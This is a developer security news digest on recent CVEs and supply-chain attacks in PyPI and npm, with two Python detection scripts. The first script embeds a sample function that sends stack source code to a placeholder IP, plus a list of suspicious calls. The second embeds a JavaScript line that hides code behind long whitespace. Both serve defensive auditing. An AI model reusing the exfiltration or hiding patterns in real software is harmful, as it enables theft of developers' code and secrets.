
Programmer’s Digest #134

05/07/2025-05/14/2025 Ivanti EPMM Vulnerabilities, Malicious PyPI Package Posing as Solana Tool, Thousands of Node Developers Compromised And More

1. Ivanti EPMM Vulnerabilities Exploited in the Wild (CVE-2025-4427, CVE-2025-4428)

Ivanti has confirmed that attackers exploited vulnerabilities in open-source libraries to compromise on-prem Endpoint Manager Mobile (EPMM) instances of a small number of customers. The flaws, now tracked as CVE-2025-4427 (authentication bypass) and CVE-2025-4428 (remote code execution), were found in unnamed libraries and likely used as zero-days. CERT-EU flagged the issues, suggesting potential breaches of EU institutions.

Ivanti has released patched EPMM versions (11.12.0.5, 12.3.0.2, 12.4.0.2, 12.5.0.1) and advises customers to update or apply mitigations if upgrades aren’t possible. These issues affect only the on-prem EPMM product. Additionally, Ivanti patched flaws in other products: CVE-2025-22462 (auth bypass in Neurons for ITSM), CVE-2025-22460 (default credentials in Cloud Services), and an unnumbered authorization flaw in Neurons for MDM. These were reported by researchers and haven’t been seen in attacks yet.

2. Malicious PyPI Package Posing as Solana Tool Stole Source Code in 761 Downloads

Cybersecurity researchers have uncovered a malicious package on PyPI, named solana-token, which pretended to be related to the Solana blockchain but was designed to steal source code and developer secrets. Though now removed, it was downloaded 761 times since its release in April 2024.

According to ReversingLabs, the package contained a fake blockchain function, register_node(), which exfiltrated source code from the Python execution stack to a hard-coded IP address. The malware appeared to target developers working on blockchain projects, likely hoping to capture sensitive, hard-coded secrets.
The method of distribution remains unclear, though it may have been promoted on developer platforms. The incident highlights the growing trend of supply chain attacks targeting the cryptocurrency space.

Experts urge development teams to closely inspect open-source and third-party packages.
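As an added example (not code from the digest or from ReversingLabs), a small AST-based audit for the pattern described above: a function that both reads the interpreter call stack and calls into a network module. The sample module, the 192.0.2.10 address and all names in it are constructed for the example.

```python
import ast

# Constructed sample imitating the behaviour the digest describes: a "blockchain"
# helper that walks the caller's frames and ships their source to a fixed address.
SAMPLE_SOURCE = '''
import inspect, urllib.request

def register_node(node_id):
    frames = inspect.stack()
    blob = "".join("".join(f.code_context or []) for f in frames)
    urllib.request.urlopen("http://192.0.2.10/upload", data=blob.encode())
    return node_id

def helper(x):
    return x * 2
'''

# Calls that read the caller's frames or source text.
STACK_ACCESS = {"inspect.stack", "inspect.getsource", "inspect.currentframe",
                "sys._getframe", "traceback.extract_stack"}
# Top-level modules whose calls move data off the host.
NETWORK_MODULES = {"socket", "urllib", "requests", "http", "httpx"}

def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def find_stack_exfil(source):
    """Names of functions that both read the call stack and use a network module."""
    flagged = []
    for fn in ast.walk(ast.parse(source)):
        if not isinstance(fn, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        calls = {_dotted(c.func) for c in ast.walk(fn) if isinstance(c, ast.Call)}
        calls.discard(None)
        reads_stack = bool(calls & STACK_ACCESS)
        talks_out = any(c.split(".")[0] in NETWORK_MODULES for c in calls)
        if reads_stack and talks_out:
            flagged.append(fn.name)
    return flagged

if __name__ == "__main__":
    print(find_stack_exfil(SAMPLE_SOURCE))  # ['register_node']
```

Either behaviour alone is common in legitimate code (debuggers read frames, clients talk to the network); the heuristic is the combination inside one function, which is what to review by hand.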

3. Thousands of Node Developers Compromised by Malware in Popular npm Packages

Malware is increasingly infiltrating the Node.js ecosystem via npm packages. Aikido Security uncovered a major supply chain attack involving the popular “rand-user-agent” package, downloaded over 45,000 times weekly. This package, used for generating randomized user-agent strings in web scraping, was found to contain a sophisticated remote access trojan (RAT). Though deprecated, the package saw three suspicious updates in recent weeks, likely after the original developer’s npm access token was compromised. Hackers used whitespace and code obfuscation to hide the RAT, which can execute shell commands and replace Python toolkits with malicious binaries. The malicious versions have since been removed, but the incident underscores the risks of compromised open-source libraries. Over 30 other npm packages used “rand-user-agent” as a dependency.

Other recent npm compromises include backdoored versions of xrpl.js and fake developer tools that hijack macOS features, showing that attackers are increasingly targeting developers and open-source repositories.
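As an added example (not code from the digest or from Aikido Security), a line-level check for the whitespace trick mentioned above: a statement that looks complete, followed by a run of spaces long enough to push a second statement off the right edge of an editor. The JavaScript sample and the gap threshold are constructed for the example.

```python
import re

# Constructed sample: line 2 ends with a normal statement, then 400 spaces,
# then a second statement that only appears if the reader scrolls sideways.
SAMPLE_JS = (
    "const agents = require('./agents.json');\n"
    + "module.exports = () => agents[Math.floor(Math.random() * agents.length)];"
    + " " * 400
    + "require('./update').start();\n"
    + "// a long but legitimate comment " + "x" * 200 + "\n"
)

# Hand-written code rarely contains a gap this wide inside one line.
MIN_GAP = 120

def find_hidden_tail(source, min_gap=MIN_GAP):
    """Return (line_no, column, hidden_text) for every line with code after a long blank run."""
    pattern = re.compile(r"\S[ \t]{%d,}(\S.*)$" % min_gap)
    hits = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        m = pattern.search(line)
        if m:
            hits.append((line_no, m.start(1), m.group(1)))
    return hits

if __name__ == "__main__":
    for line_no, col, text in find_hidden_tail(SAMPLE_JS):
        print(f"line {line_no}, col {col}: {text}")
```

Run it over a package's published tarball rather than its git repository, since the digest's point is that the registry contents diverged from what the maintainer intended.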

4. SonicWall Patches 3 Flaws in SMA 100 Devices Allowing Attackers to Run Code as Root

SonicWall has released patches for three vulnerabilities in SMA 100 Series appliances that could lead to remote code execution if chained together. The flaws affect devices including SMA 200, 210, 400, 410, and 500v and are fixed in version 10.2.1.15-81sv.

The issues are:

  • CVE-2025-32819 (CVSS 8.8): Lets an attacker delete arbitrary files, potentially triggering a factory reset.
  • CVE-2025-32820 (CVSS 8.3): Makes any directory writable via path traversal.
  • CVE-2025-32821 (CVSS 6.7): Allows file uploads via shell command injection.

Rapid7 warns these can be chained to gain root-level remote code execution. CVE-2025-32819 may be a patch bypass for a 2021 flaw and could have been exploited as a zero-day, though SonicWall hasn’t confirmed active abuse.

Users are strongly urged to update their systems immediately.

5. Microsoft Fixes 78 Flaws, 5 Zero-Days Exploited; CVSS 10 Bug Impacts Azure DevOps Server

Microsoft’s May 2025 Patch Tuesday update fixes 78 vulnerabilities, including five zero-days under active exploitation. Of these, 11 are rated Critical and 66 Important; 28 allow remote code execution. The update also includes fixes for Edge browser issues.

The five exploited zero-days are:

  • CVE-2025-30397 – Scripting Engine memory corruption enabling remote code execution;
  • CVE-2025-30400 – Desktop Window Manager (DWM) privilege escalation;
  • CVE-2025-32701 and CVE-2025-32706 – Common Log File System (CLFS) driver privilege escalations;
  • CVE-2025-32709 – WinSock driver privilege escalation.

These flaws are linked to malware like QakBot and Play ransomware, and some have been exploited by APT groups.

CISA has added the five zero-days to its Known Exploited Vulnerabilities catalog, requiring U.S. federal agencies to patch by June 3, 2025. Additional fixes address bugs in Microsoft Defender for Endpoint and Identity, and a CVSS 10.0 flaw in Azure DevOps Server, now mitigated in the cloud.
